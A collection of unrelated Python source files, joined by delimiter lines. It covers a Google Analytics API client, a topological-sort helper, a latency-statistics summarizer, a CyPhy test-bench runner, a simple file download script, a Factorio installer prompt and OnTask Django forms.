secret for installed applications. Defaults
to None.
Raises:
FileNotFoundError: Raised when a user tries to use oauth
authentication without specifying a client secrets file.
Returns:
Resource: Returns a Google API Resource object that allows users to
query and receive data from the API.
"""
if not from_service and fileName:
service = _authenticate_install(fileName)
elif from_service:
service = _authenticate_service(fileName)
elif not from_service and not fileName:
raise FileNotFoundError(
"If using oauth you must specify a file name using fileName"
"parameter.")
return service
# TODO: Unit tests
def _authenticate_service(fileName=None):
"""
Function will try to authenticate using either the file name provided or
by accessing environment variable (GOOGLE_APPLICATION_CREDENTIALS) that
provides a path to the client key .json file.
Args:
fileName (string, optional): File name passed through from
authenticate(). Defaults to None.
Raises:
FileNotFoundError: Raised when provided file name cannot be found.
RuntimeWarning: Warns user that a .env file cannot be found.
ValueError: Raised when GOOGLE_APPLICATION_CREDENTIALS cannot be found
in the environment variables.
Returns:
Returns a Google API Resource object that allows users to query and
receive data from the API.
"""
if fileName:
filePath = os.path.join(BASEDIR, fileName)
if os.path.isfile(filePath):
credentials = service_account.Credentials.from_service_account_file(
filename=filePath, scopes=DEFAULT_SCOPE)
else:
raise FileNotFoundError("Cannot find your provided file. Please"
"only pass a file name and .json extension."
"File should be located in the same"
"directory as where you are running your"
"script from.")
else:
filePath = os.path.join(BASEDIR, ".env")
if os.path.isfile(filePath):
load_dotenv(filePath)
else:
raise RuntimeWarning("The .env file cannot be found, still"
f"checking environment for {REQUIRED_ENV_VAR}."
"Make sure you are storing the file in the"
"same directory as where you are running your"
"script from.")
if REQUIRED_ENV_VAR in list(os.environ):
credentials, _ = auth.default(scopes=DEFAULT_SCOPE)
else:
raise ValueError(f"Could not find {REQUIRED_ENV_VAR} in environment"
"variables. Make sure it is specified in your .env"
"file or in the environment.")
return Client(_build(credentials))
# TODO: Add option to store and load credentials.
# TODO: Unit tests
def _authenticate_install(fileName):
"""
Function will try to authenticate using a client secrets .json file provided
via fileName.
Args:
fileName (string): File name passed through from authenticate().
Raises:
FileNotFoundError: Raised when provided file name cannot be found.
Returns:
Returns a Google API Resource object that allows users to query and
receive data from the API.
"""
filePath = os.path.join(BASEDIR, fileName)
if os.path.isfile(filePath):
flow = InstalledAppFlow.from_client_secrets_file(
filePath, scopes=DEFAULT_SCOPE)
flow.run_local_server()
credentials = flow.credentials
else:
raise FileNotFoundError("Cannot find your provided file. Please only"
"pass a file name and .json extension. File"
"should be located in the same directory as"
"where you are running your script from.")
return Client(_build(credentials))
def _build(credentials):
return discovery.build(API_NAME, API_VERSION, credentials=credentials)
def _prefix_ga(value):
prefix = ''
if value[0] == '-':
value = value[1:]
prefix = '-'
if not value.startswith('ga:'):
prefix += "ga:"
return prefix + value
class Client(object):
def __init__(self, service):
self.service = service
def query(self):
return QueryClient(self.service)
class QueryClient(object):
def __init__(self, service):
super(Client, self).__init__(service)
def _to_list(self, value):
"""Turn an argument into a list"""
if value is None:
return []
elif isinstance(value, list):
return value
else:
return [value]
def _to_ga_param(self, values):
"""Turn a list of values into a GA list parameter"""
return ','.join(map(_prefix_ga, values))
def get(self, ids, start_date, end_date, metrics,
dimensions=None, filters=None,
max_results=None, sort=None, segment=None):
ids = self._to_list(ids)
metrics = self._to_list(metrics)
start_date = start_date.strftime("%Y-%m-%d")
end_date = end_date.strftime("%Y-%m-%d")
dimensions = self._to_list(dimensions)
filters = self._to_list(filters)
sort = self._to_list(sort)
return self._get_response(
metrics, dimensions,
ids=self._to_ga_param(ids),
start_date=start_date,
end_date=end_date,
metrics=self._to_ga_param(metrics),
dimensions=self._to_ga_param(dimensions) or None,
filters=self._to_ga_param(filters) or None,
sort=self._to_ga_param(sort) or None,
max_results=max_results,
segment=segment
)
def _filter_empty(self, kwargs, key):
if key in kwargs and kwargs[key] is None:
del kwargs[key]
return kwargs
def get_raw_response(self, **kwargs):
# Remove specific keyword arguments if they are `None`
for arg in "dimensions filters sort max_results segment".split():
kwargs = self._filter_empty(kwargs, arg)
return self.service.report().batchGet(**kwargs).execute()
|
import itertools
from syloga.transform.get_assignments import get_assignments
from syloga.ast.traversal.iter_dependees import iter_dependees
from syloga.ast.traversal.iter_dependencies import iter_dependencies
from syloga.utils.functional import compose
from syloga.utils.functional import iter_unique
from syloga.ast.core import Indexed
from syloga.ast.containers import Tuple
def iter_generic_topo_group(iterable, get_dependees, get_dependencies):
items = list(iterable)
get_all_f = lambda f: lambda x: list(itertools.chain(*map(f, x)))
get_all_dependees = get_all_f(get_dependees)
get_all_dependencies = get_all_f(get_dependencies)
is_resolved = lambda x: (x in resolved_dependees) or (x not in all_dependees)
all_resolved = lambda x: all(map(is_resolved, x))
all_dependencies_resolved = lambda x: all_resolved(get_dependencies(x))
all_dependees = get_all_dependees(items)
all_dependencies = get_all_dependencies(items)
resolved_dependees = set()
unresolved_items = items
while len(unresolved_items) > 0:
#print(unresolved_items)
group, unresolved_items = list_partition(all_dependencies_resolved, unresolved_items)
yield group
resolved_dependees.update(set(get_all_dependees(group)))
def list_generic_topo_group(iterable, get_dependees, get_dependencies):
return list(iter_generic_topo_group(iterable, get_dependees, get_dependencies))
def topo_depth(expression):
return len(topo_group(expression))
def topo_group(expression, sort_in_group = True):
assignments = get_assignments(expression, preorder_traversal)
#is_lvalue = lambda x: isinstance(x, (Symbol, Indexed, Indexable))
#list_lvalues = lambda x: list(filter(is_lvalue,preorder_traversal(x)))
get_lhs = lambda x: x.lhs
get_rhs = lambda x: x.rhs
get_dependees = compose(
list,
iter_unique,
iter_dependees,
)
get_dependencies = compose(
list,
iter_unique,
iter_dependencies,
)
groups = list_generic_topo_group(
assignments,
get_dependees,
get_dependencies
)
if sort_in_group:
sort_key = lambda lhs: (
tuple([lhs.args])
if type(lhs) == Indexed else
tuple([split_name_id(str(lhs), -1)])
)
sort_group = lambda group: sorted(group, key=compose(
sort_key,
list_lvalues,
get_lhs
))
groups = map(sort_group, groups)
groups = Tuple(*itertools.starmap(Tuple,groups))
return groups
def topo_sort(assignments):
groups = topo_group(assignments, sort_in_group=True)
return Tuple(*itertools.chain(*groups))
|
##################################################
## A helper to summarize the statistics from a ##
## concurrent run for the query workload. ########
##################################################
import argparse
import pprint
import glob
import os
import csv
import numpy as np
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog = 'Summarize query latency', description='Summarize the runs from the multiple files emitted from a concurrent run.')
parser.add_argument('--directory', '-d', dest="directory", action = "store", required = True, help = "The directory which has the runs for the experiment being summarized.")
parser.add_argument('--pattern', '-p', dest="pattern", action = "store", default = "*.csv", help = "Pattern to search for in the files.")
parser.add_argument('--output-file', '-o', dest="outputFile", action = "store", required = True, help = "The output file to store summarized output.")
args = parser.parse_args()
print(args)
if not os.path.isdir(args.directory):
print("Invalid path: ", args.directory)
exit()
headerString = None
perQueryStats = dict()
perQueryAggregatedStats = dict()
try:
## Convert to absolute path. Add a trailing separator if it doesn't exist
absoluteDirPath = os.path.join(os.path.abspath(args.directory), '')
fileCount = 0
## Recursively read in add the files that contain the per thread summary based on the specified file pattern.
for filename in glob.iglob(absoluteDirPath + os.path.join('**', args.pattern), recursive=True):
with open(filename) as csvfile:
lineReader = csv.reader(csvfile)
header = True
## Here we assume that these files are comma-separated summary of the individual thread's execution stats.
## Each file has a header and number of rows of summarized stats.
## Each row has the first column as the name of the query, and subsequent columns as the stats.
## Example file with header and one row.
## Query type, Total Count, Successful Count, Avg. latency (in secs), Std dev latency (in secs), Median, 90th perc (in secs), 99th Perc (in secs), Geo Mean (in secs)
## do-q1,11586.5,11586.5,0.47,0.156,0.451,0.525,0.729,0.463
for row in lineReader:
if header:
## We assume all files have the same header row. So save the row of one of the files.
headerString = row
header = False
continue
## The first column is the name of the query. We find all the summarizes for this operation across all the files.
if row[0] not in perQueryStats:
perQueryStats[row[0]] = list()
## Store the stats second column onwards.
perQueryStats[row[0]].append([float(x) for x in row[1:]])
fileCount += 1
for key in perQueryStats.keys():
value = perQueryStats[key]
## For each column, compute the average across all the files.
perElementAvg = np.average(value, axis=0)
perQueryAggregatedStats[key] = ["{0}".format(round(x, 3)) for x in perElementAvg]
## Write the summary in the aggregate file in the same format as the original files
## First row is the header read from the files.
## Second row onwards is the aggregated summary for each operation, averaged across all the files found in the specified path.
outputFile = os.path.join(args.directory, args.outputFile)
print("Processed {0} files. Summary written to: {1}".format(fileCount, outputFile))
with open(outputFile, 'w') as out:
writer = csv.writer(out)
writer.writerow(headerString)
for key in perQueryAggregatedStats.keys():
row = list()
row.append(key)
row.extend(perQueryAggregatedStats[key])
writer.writerow(row)
except Exception as e:
pprint.pprint(e)
raise e |
# coding: utf-8
r"""
Run MasterInterpreter on TestBenches, run the JobManager command, and compare Metrics to MetricConstraints.
e.g.
META\bin\Python27\Scripts\python META\bin\RunTestBenches.py --max_configs 2 "Master Combined.mga" -- -s --with-xunit
"""
import os
import os.path
import operator
import unittest
import nose.core
import subprocess
import json
import itertools
import collections
from nose.loader import TestLoader
from nose.plugins.manager import BuiltinPluginManager
from nose.config import Config, all_config_files
from win32com.client import DispatchEx
Dispatch = DispatchEx
import _winreg as winreg
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Software\META") as software_meta:
meta_path, _ = winreg.QueryValueEx(software_meta, "META_PATH")
def log(s):
print s
class TestBenchTest(unittest.TestCase):
def __init__(self, *args):
super(TestBenchTest, self).__init__(*args)
self.longMessage = True
# this class will get methods added to it
def _testTestBench(self, context, master, config):
result = master.RunInTransactionWithConfigLight(config)[0]
if not result.Success:
self.fail(result.Exception)
print 'Output directory is {}'.format(result.OutputDirectory)
project = context.Project
project.BeginTransactionInNewTerr()
try:
kind = context.Meta.Name
finally:
project.AbortTransaction()
if kind == 'ParametricExploration':
import run_mdao
import openmdao.api
originalDir = os.getcwd()
test = self
class ConstraintCheckingRecorder(openmdao.api.BaseRecorder):
def record_metadata(self, group):
pass
def record_derivatives(self, derivs, metadata):
pass
def record_iteration(self, *args, **kwargs):
test._checkParametricExplorationMetrics(context, self.root)
def close(self):
pass
def startup(self, root):
super(ConstraintCheckingRecorder, self).startup(root)
self.root = root
os.chdir(result.OutputDirectory)
try:
mdao_top = run_mdao.run('mdao_config.json', additional_recorders=[ConstraintCheckingRecorder()])
finally:
os.chdir(originalDir)
self._checkParametricExplorationMetrics(context, mdao_top.root)
else:
try:
subprocess.check_call((os.path.join(meta_path, r'bin\Python27\Scripts\python.exe'), '-m', 'testbenchexecutor', '--detailed-errors', 'testbench_manifest.json'),
cwd=result.OutputDirectory)
except:
failed_txt = os.path.join(result.OutputDirectory, '_FAILED.txt')
if os.path.isfile(failed_txt):
print(open(failed_txt, 'r').read())
raise
with open(os.path.join(result.OutputDirectory, 'testbench_manifest.json')) as manifest_file:
manifest = json.load(manifest_file)
self.assertEqual(manifest['Status'], 'OK')
self._checkTestBenchMetrics(context, manifest, result.OutputDirectory)
# metrics = {metric['GMEID']: metric['Value'] for metric in manifest['Metrics']}
def _checkParametricExplorationMetrics(self, pet, mdao_group):
project = pet.Project
project.BeginTransactionInNewTerr()
root = pet
def getPathNames(pet):
ret = []
while pet.ID != root.ID:
ret.append(pet.Name)
pet = pet.ParentModel
ret.reverse()
return ret
try:
def getMetricValue(metric_fco, pet, ref):
componentName = metric_fco.ParentModel.Name
if ref is not None:
componentName = ref.Name
group = mdao_group
for name in getPathNames(pet):
group = getattr(group, name)._problem.root
return getattr(group, componentName).unknowns[metric_fco.Name]
queue = collections.deque()
queue.append(pet)
while queue:
pet = queue.pop()
for childPET in (p for p in pet.ChildFCOs if p.Meta.Name == 'ParametricExploration'):
queue.append(childPET)
for constraintBinding in (me for me in pet.ChildFCOs if me.MetaBase.Name == 'MetricConstraintBinding'):
if constraintBinding.Src.Meta.Name == 'Metric':
metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
metric_refs = constraintBinding.SrcReferences
else:
constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
metric_refs = constraintBinding.DstReferences
testBenchRef = metric_refs.Item(1) if len(metric_refs) else None
value = getMetricValue(metric_fco, pet, testBenchRef)
parentName = testBenchRef.Name if testBenchRef else metric_fco.ParentModel.Name
self._testMetricConstraint(value, constraintBinding, metric_name='.'.join(itertools.chain(getPathNames(pet), [parentName, metric_fco.Name])))
for testBenchRef in (tb for tb in pet.ChildFCOs if tb.Meta.Name == 'TestBenchRef'):
for constraintBinding in (me for me in testBenchRef.Referred.ChildFCOs if me.MetaBase.Name == 'MetricConstraintBinding'):
if constraintBinding.Src.Meta.Name == 'Metric':
metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
else:
constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
value = getMetricValue(metric_fco, pet, testBenchRef)
self._testMetricConstraint(value, constraintBinding, metric_name='.'.join(itertools.chain(getPathNames(pet), [testBenchRef.Name, metric_fco.Name])))
finally:
project.AbortTransaction()
def _checkTestBenchMetrics(self, testBench, manifest, outputDir):
project = testBench.Project
project.BeginTransactionInNewTerr()
try:
manifestMetrics = {m['Name']: m['Value'] for m in manifest['Metrics']}
def getMetricValue(metric_fco):
return manifestMetrics[metric_fco.Name]
for constraintBinding in (me for me in testBench.ChildFCOs if me.MetaBase.Name == 'MetricConstraintBinding'):
if constraintBinding.Src.Meta.Name == 'Metric':
metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
else:
constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
value = getMetricValue(metric_fco)
self._testMetricConstraint(value, constraintBinding)
finally:
project.AbortTransaction()
def _testMetricConstraint(self, value, constraintBinding, metric_name=None):
if constraintBinding.Src.Meta.Name == 'Metric':
metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
else:
constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
target_type = constraint.GetStrAttrByNameDisp('TargetType')
target_value = constraint.GetFloatAttrByNameDisp('TargetValue')
try:
value_float = float(value)
except ValueError:
self.fail('Metric {} has value "{}" that is not a number'.format(metric_fco.Name, value))
if target_type == 'Must Exceed':
test = self.assertGreater
elif target_type == 'Must Not Exceed':
test = self.assertLessEqual
else:
test = self.assertAlmostEqual
test(value_float, target_value, msg='Metric {} failed'.format(metric_name or metric_fco.Name))
def crawlForKinds(root, folderKinds, modelKinds):
queue = collections.deque()
queue.append(root)
while queue:
folder = queue.pop()
for child_folder in (f for f in folder.ChildFolders if f.MetaBase.Name in folderKinds):
queue.append(child_folder)
for child in folder.ChildFCOs:
if child.Meta.Name in modelKinds:
yield child
if __name__ == '__main__':
def run():
import argparse
parser = argparse.ArgumentParser(description='Run TestBenches.')
parser.add_argument('--max_configs', type=int)
parser.add_argument('--run_desert', action='store_true')
parser.add_argument('model_file')
parser.add_argument('nose_options', nargs=argparse.REMAINDER)
command_line_args = parser.parse_args()
project = Dispatch("Mga.MgaProject")
mga_file = command_line_args.model_file
if mga_file.endswith('.xme'):
project = Dispatch("Mga.MgaProject")
parser = Dispatch("Mga.MgaParser")
resolver = Dispatch("Mga.MgaResolver")
resolver.IsInteractive = False
parser.Resolver = resolver
mga_file = os.path.splitext(command_line_args.model_file)[0] + ".mga"
project.Create("MGA=" + os.path.abspath(mga_file), "CyPhyML")
parser.ParseProject(project, command_line_args.model_file)
else:
# n.b. without abspath, things break (e.g. CyPhy2CAD)
project.OpenEx("MGA=" + os.path.abspath(command_line_args.model_file), "CyPhyML", None)
project.BeginTransactionInNewTerr()
try:
if command_line_args.run_desert:
desert = Dispatch("MGA.Interpreter.DesignSpaceHelper")
desert.Initialize(project)
filter = project.CreateFilter()
filter.Kind = "DesignContainer"
# FIXME wont work right for TBs that point to non-root design sace
designContainers = [tb for tb in project.AllFCOs(filter) if not tb.IsLibObject and tb.ParentFolder is not None]
for designContainer in designContainers:
desert.InvokeEx(project, designContainer, Dispatch("MGA.MgaFCOs"), 128)
def add_fail(masterContext, configName, message):
def fail(self):
raise ValueError(message)
fail.__name__ = str('test_' + masterContext.Name + "__" + configName)
setattr(TestBenchTest, fail.__name__, fail)
def add_test(masterContext, mi_config, config):
def testTestBench(self):
self._testTestBench(masterContext, master, mi_config)
# testTestBench.__name__ = str('test_' + masterContext.Name + "_" + masterContext.ID + "__" + config.Name)
testTestBench.__name__ = str('test_' + masterContext.Name + "__" + config.Name)
setattr(TestBenchTest, testTestBench.__name__, testTestBench)
master = Dispatch("CyPhyMasterInterpreter.CyPhyMasterInterpreterAPI")
master.Initialize(project)
modelKinds = set(("TestBench", "CADTestBench", "KinematicTestBench", "BlastTestBench", "BallisticTestBench", "CarTestBench", "CFDTestBench", "ParametricExploration"))
# masterContexts = [tb for tb in itertools.chain(*(project.AllFCOs(filter) for filter in filters)) if not tb.IsLibObject]
masterContexts = list(crawlForKinds(project.RootFolder, ("ParametricExplorationFolder", "Testing"), modelKinds))
print repr([t.Name for t in masterContexts])
for masterContext in masterContexts:
configs = None
if masterContext.Meta.Name == "ParametricExploration":
tbs = [tb for tb in masterContext.ChildFCOs if tb.MetaBase.Name == 'TestBenchRef' and tb.Referred is not None]
if not tbs:
configs = [masterContext]
else:
testBench = tbs[0].Referred
else:
testBench = masterContext
if not configs:
suts = [sut for sut in testBench.ChildFCOs if sut.MetaRole.Name == 'TopLevelSystemUnderTest']
if len(suts) == 0:
add_fail(masterContext, 'invalid', 'Error: TestBench "{}" has no TopLevelSystemUnderTest'.format(testBench.Name))
continue
if len(suts) > 1:
add_fail(masterContext, 'invalid', 'Error: TestBench "{}" has more than one TopLevelSystemUnderTest'.format(testBench.Name))
continue
sut = suts[0]
if sut.Referred.MetaBase.Name == 'ComponentAssembly':
configs = [sut.Referred]
else:
configurations = [config for config in sut.Referred.ChildFCOs if config.MetaBase.Name == 'Configurations']
if not configurations:
add_fail(masterContext, 'invalid', 'Error: design has no Configurations models. Try using the --run_desert option')
continue
configurations = configurations[0]
cwcs = [cwc for cwc in configurations.ChildFCOs if cwc.MetaBase.Name == 'CWC' and cwc.Name]
if not cwcs:
raise ValueError('Error: could not find CWCs for "{}"'.format(testBench.Name))
configs = list(cwcs)
# FIXME cfg2 > cfg10
configs.sort(key=operator.attrgetter('Name'))
configs = configs[slice(0, command_line_args.max_configs)]
for config in configs:
mi_config = Dispatch("CyPhyMasterInterpreter.ConfigurationSelectionLight")
# GME id, or guid, or abs path or path to Test bench or SoT or PET
mi_config.ContextId = masterContext.ID
mi_config.SetSelectedConfigurationIds([config.ID])
# mi_config.KeepTemporaryModels = True
mi_config.PostToJobManager = False
add_test(masterContext, mi_config, config)
finally:
project.CommitTransaction()
config = Config(files=all_config_files(), plugins=BuiltinPluginManager())
config.configure(argv=['nose'] + command_line_args.nose_options)
loader = TestLoader(config=config)
tests = [loader.loadTestsFromTestClass(TestBenchTest)]
try:
nose.core.TestProgram(suite=tests, argv=['nose'] + command_line_args.nose_options, exit=True, testLoader=loader, config=config)
finally:
# project.Save(project.ProjectConnStr + "_debug.mga", True)
project.Close(True)
run()
|
'''
Author: your name
Date: 2022-02-14 11:41:47
LastEditTime: 2022-02-14 12:10:52
LastEditors: Please set LastEditors
Description: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE
FilePath: \Work\Lensi\download_try.py
'''
from urllib.request import urlretrieve
url = "https://dl5.filehippo.com/970/a88/349cf04cf44eeb26171a12b3c423b95ce3/geek.zip?Expires=1644851477&Signature=688ecc6881adcafce3b34e2b86b5df2cab0d7bb4&url=https://filehippo.com/download_geek-uninstaller/&Filename=geek.zip"
url_name = "app" + url[url.rfind("."):]
urlretrieve(url,url_name)
|
from __future__ import print_function, unicode_literals
from PyInquirer import style_from_dict, Token, prompt, Separator
from examples import custom_style_1
from examples import custom_style_2
from examples import custom_style_3
from pprint import pprint
import os, errno
import wget
import urllib.request
import shutil
from pathlib import Path
import subprocess
from flask import Flask, render_template, request
from werkzeug.utils import secure_filename
import json
# Factocli installs the following:
# a headless factorio server
# a flask webserver for the statistics
# a flask api for the android app
# Choise is experimental server
# give the path where factorio must be installed
#
def ask_path_to_install_server():
where_to_install_prompt = {
'type': 'input',
'name': 'install_path',
'message': 'Where do you want to install factorio? # /opt is recommended!',
}
answers = prompt(where_to_install_prompt)
return answers['install_path']
def confirm_where_to_install(path):
confirm_where_to_install = {
'type': 'confirm',
'name': 'confirm_where_to_install',
'message': 'Are you sure you want to install in ' + path + " ?",
}
answers = prompt(confirm_where_to_install)
return answers['confirm_where_to_install']
def install_server_main():
install_path = ask_path_to_install_server()
print(install_path)
yesorno = confirm_where_to_install(install_path)
if yesorno:
print("Checking path...")
if(install_path[0] == "~"):
install_path = install_path.replace("~", "")
home_path = str(Path.home())
new_install_path = home_path + install_path
path_exists = os.path.isdir(new_install_path)
print(new_install_path)
if(path_exists):
print("The directory " + new_install_path + " exists...")
try:
#os.makedirs(install_path, exist_ok=False)
print("Proceeding with the install...")
#Download the latest factorio expermimental headless server file
#download_latest_factorio_headless_server(new_install_path,url_version)
except FileExistsError:
# directory already exists
print("Error Creating the directory in " + new_install_path)
if(path_exists == False):
print("The directory" + new_install_path + "doesn't exists")
print("please make sure the directory exists")
else:
path_exists = os.path.isdir(install_path)
if(path_exists):
print("The directory " + install_path + " exists...")
try:
#os.makedirs(install_path, exist_ok=False)
print("Proceeding with the install...")
#Download the latest factorio expermimental headless server file
#download_latest_factorio_headless_server(install_path,url_version)
except FileExistsError:
# directory already exists
print("Error Creating the directory in " + install_path)
if(path_exists == False):
print("The directory" + install_path + "doesn't exists")
print("please make sure the directory exists")
else:
print("Please try again") |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import json
import re
from datetimewidget.widgets import DateTimeWidget
from django import forms
from django.utils.translation import ugettext_lazy as _
from django_summernote.widgets import SummernoteInplaceWidget
from validate_email import validate_email
from dataops.pandas_db import execute_select_on_table, get_table_cursor, \
is_column_table_unique, get_table_data
from ontask import ontask_prefs, is_legal_name
from ontask.forms import column_to_field, dateTimeOptions, RestrictedFileField
from .models import Action, Condition
# Field prefix to use in forms to avoid using column names (they are given by
# the user and may pose a problem (injection bugs)
field_prefix = '___ontask___select_'
participant_re = re.compile('^Participant \d+$')
class ActionUpdateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.user = kwargs.pop(str('workflow_user'), None)
self.workflow = kwargs.pop(str('action_workflow'), None)
super(ActionUpdateForm, self).__init__(*args, **kwargs)
class Meta:
model = Action
fields = ('name', 'description_text')
class ActionForm(ActionUpdateForm):
class Meta:
model = Action
fields = ('name', 'description_text', 'action_type')
class ActionDescriptionForm(forms.ModelForm):
class Meta:
model = Action
fields = ('description_text',)
class EditActionOutForm(forms.ModelForm):
"""
Main class to edit an action out.
"""
content = forms.CharField(label='', required=False)
def __init__(self, *args, **kargs):
super(EditActionOutForm, self).__init__(*args, **kargs)
if self.instance.action_type == Action.PERSONALIZED_TEXT:
self.fields['content'].widget = SummernoteInplaceWidget()
else:
# Add the target_url field
self.fields['target_url'] = forms.CharField(
initial=self.instance.target_url,
label=_('Target URL'),
strip=True,
required=False,
widget=forms.Textarea(
attrs={
'rows': 1,
'cols': 120,
'placeholder': _('URL to send the personalized JSON')
}
)
)
# Modify the content field so that it uses the TextArea
self.fields['content'].widget = forms.Textarea(
attrs={'cols': 80,
'rows': 15,
'placeholder': _('Write a JSON object')}
)
class Meta:
model = Action
fields = ('content',)
# Form to enter values in a row
class EnterActionIn(forms.Form):
def __init__(self, *args, **kargs):
# Store the instance
self.columns = kargs.pop('columns', None)
self.values = kargs.pop('values', None)
self.show_key = kargs.pop('show_key', False)
super(EnterActionIn, self).__init__(*args, **kargs)
# If no initial values have been given, replicate a list of Nones
if not self.values:
self.values = [None] * len(self.columns)
for idx, column in enumerate(self.columns):
# Skip the key columns if flag is true
if not self.show_key and column.is_key:
continue
self.fields[field_prefix + '%s' % idx] = \
column_to_field(column,
self.values[idx],
label=column.description_text)
if column.is_key:
self.fields[field_prefix + '%s' % idx].widget.attrs[
'readonly'
] = 'readonly'
self.fields[field_prefix + '%s' % idx].disabled = True
class FilterForm(forms.ModelForm):
"""
Form to read information about a filter. The required property of the
formula field is set to False because it is enforced in the server.
"""
def __init__(self, *args, **kwargs):
super(FilterForm, self).__init__(*args, **kwargs)
# Required enforced in the server (not in the browser)
self.fields['formula'].required = False
# Filter should be hidden.
self.fields['formula'].widget = forms.HiddenInput()
class Meta:
model = Condition
fields = ('name', 'description_text', 'formula')
class ConditionForm(FilterForm):
"""
Form to read information about a condition. The same as the filter but we
need to enforce that the name is a valid variable name
"""
def __init__(self, *args, **kwargs):
super(ConditionForm, self).__init__(*args, **kwargs)
# Remember the condition name to perform content substitution
self.old_name = None,
if hasattr(self, 'instance'):
self.old_name = self.instance.name
def clean(self):
data = super(ConditionForm, self).clean()
msg = is_legal_name(data['name'])
if msg:
self.add_error('name', msg)
return data
return data
class EnableURLForm(forms.ModelForm):
def clean(self):
data = super(EnableURLForm, self).clean()
# Check the datetimes. One needs to be after the other
a_from = self.cleaned_data['active_from']
a_to = self.cleaned_data['active_to']
if a_from and a_to and a_from >= a_to:
self.add_error(
'active_from',
_('Incorrect date/time window')
)
self.add_error(
'active_to',
_('Incorrect date/time window')
)
return data
class Meta:
model = Action
fields = ('serve_enabled', 'active_from', 'active_to')
widgets = {
'active_from': DateTimeWidget(options=dateTimeOptions,
usel10n=True,
bootstrap_version=3),
'active_to': DateTimeWidget(options=dateTimeOptions,
usel10n=True,
bootstrap_version=3)
}
class EmailActionForm(forms.Form):
subject = forms.CharField(max_length=1024,
strip=True,
required=True,
label=_('Email subject'))
email_column = forms.ChoiceField(
label=_('Column to use for target email address'),
required=True
)
cc_email = forms.CharField(
label=_('Comma separated list of CC emails'),
required=False
)
bcc_email = forms.CharField(
label=_('Comma separated list of BCC emails'),
required=False
)
send_confirmation = forms.BooleanField(
initial=False,
required=False,
label=_('Send you a summary message?')
)
track_read = forms.BooleanField(
initial=False,
required=False,
label=_('Track email reading in an extra column?')
)
export_wf = forms.BooleanField(
initial=False,
required=False,
label=_('Download a snapshot of the workflow?'),
help_text=_('A zip file useful to review the emails sent.')
)
confirm_emails = forms.BooleanField(
initial=False,
required=False,
label=_('Check/exclude email addresses before sending?')
)
def __init__(self, *args, **kargs):
self.column_names = kargs.pop('column_names')
self.action = kargs.pop('action')
self.op_payload = kargs.pop('op_payload')
super(EmailActionForm, self).__init__(*args, **kargs)
# Set the initial values from the payload
self.fields['subject'].initial = self.op_payload.get('subject', '')
email_column = self.op_payload.get('item_column', None)
self.fields['cc_email'].initial = self.op_payload.get('cc_email', '')
self.fields['bcc_email'].initial = self.op_payload.get('bcc_email', '')
self.fields['confirm_emails'].initial = self.op_payload.get(
'confirm_emails', False)
self.fields['send_confirmation'].initial = self.op_payload.get(
'send_confirmation', False)
self.fields['track_read'].initial = self.op_payload.get('track_read',
False)
self.fields['export_wf'].initial = self.op_payload.get('export_wf',
False)
if email_column is None:
# Try to guess if there is an "email" column
email_column = next((x for x in self.column_names
if 'email' == x.lower()), None)
if email_column is None:
email_column = ('', '---')
else:
email_column = (email_column, email_column)
self.fields['email_column'].initial = email_column
self.fields['email_column'].choices = \
[(x, x) for x in self.column_names]
def clean(self):
data = super(EmailActionForm, self).clean()
email_column = self.cleaned_data['email_column']
# Check if the values in the email column are correct emails
try:
column_data = execute_select_on_table(self.action.workflow.id,
[],
[],
column_names=[email_column])
if not all([validate_email(x[0]) for x in column_data]):
# column has incorrect email addresses
self.add_error(
'email_column',
_('The column with email addresses has incorrect values.')
)
except TypeError:
self.add_error(
'email_column',
_('The column with email addresses has incorrect values.')
)
if not all([validate_email(x)
for x in self.cleaned_data['cc_email'].split(',') if x]):
self.add_error(
'cc_email',
_('Field needs a comma-separated list of emails.')
)
if not all([validate_email(x)
for x in self.cleaned_data['bcc_email'].split(',') if x]):
self.add_error(
'bcc_email',
_('Field needs a comma-separated list of emails.')
)
return data
class Meta:
widgets = {'subject': forms.TextInput(attrs={'size': 256})}
class ZipActionForm(forms.Form):
participant_column = forms.ChoiceField(
label=_('Key column to use for file name prefix (Participant id if '
'Moodle ZIP)'),
required=True
)
user_fname_column = forms.ChoiceField(
label=_('Column to use for file name prefix (Full name if Moodle ZIP)'),
required=False
)
file_suffix = forms.CharField(
max_length=512,
strip=True,
required=False,
label='File name suffix ("feedback.html" if empty)'
)
zip_for_moodle = forms.BooleanField(
initial=False,
required=False,
label=_('This ZIP will be uploaded to Moodle as feedback')
)
confirm_users = forms.BooleanField(
initial=False,
required=False,
label=_('Check/exclude users before sending?')
)
def __init__(self, *args, **kargs):
self.column_names = kargs.pop('column_names')
self.action = kargs.pop('action')
self.op_payload = kargs.pop('op_payload')
super(ZipActionForm, self).__init__(*args, **kargs)
# Set the initial values from the payload
user_fname_column = self.op_payload.get('user_fname_column', None)
participant_column = self.op_payload.get('item_column', None)
if user_fname_column:
self.fields['user_fname_column'].choices = \
[(x, x) for x in self.column_names]
self.fields['user_fname_column'].initial = user_fname_column
else:
self.fields['user_fname_column'].choices = \
[('', '---')] + [(x, x) for x in self.column_names]
self.fields['user_fname_column'].initial = ('', '---')
if participant_column:
self.fields['participant_column'].choices = \
[(x, x) for x in self.column_names]
self.fields['participant_column'].initial = participant_column
else:
self.fields['participant_column'].choices = \
[('', '---')] + [(x, x) for x in self.column_names]
self.fields['participant_column'].initial = ('', '---')
self.fields['confirm_users'].initial = self.op_payload.get(
'confirm_users', False)
def clean(self):
data = super(ZipActionForm, self).clean()
# Participant column must be unique
pcolumn = data['participant_column']
ufname_column = data['user_fname_column']
# The given column must have unique values
if not is_column_table_unique(self.action.workflow.pk, pcolumn):
self.add_error(
'participant_column',
_('Column needs to have all unique values (no empty cells)')
)
return data
# If both values are given and they are identical, return with error
if pcolumn and ufname_column and pcolumn == ufname_column:
self.add_error(
None,
_('The two columns must be different')
)
return data
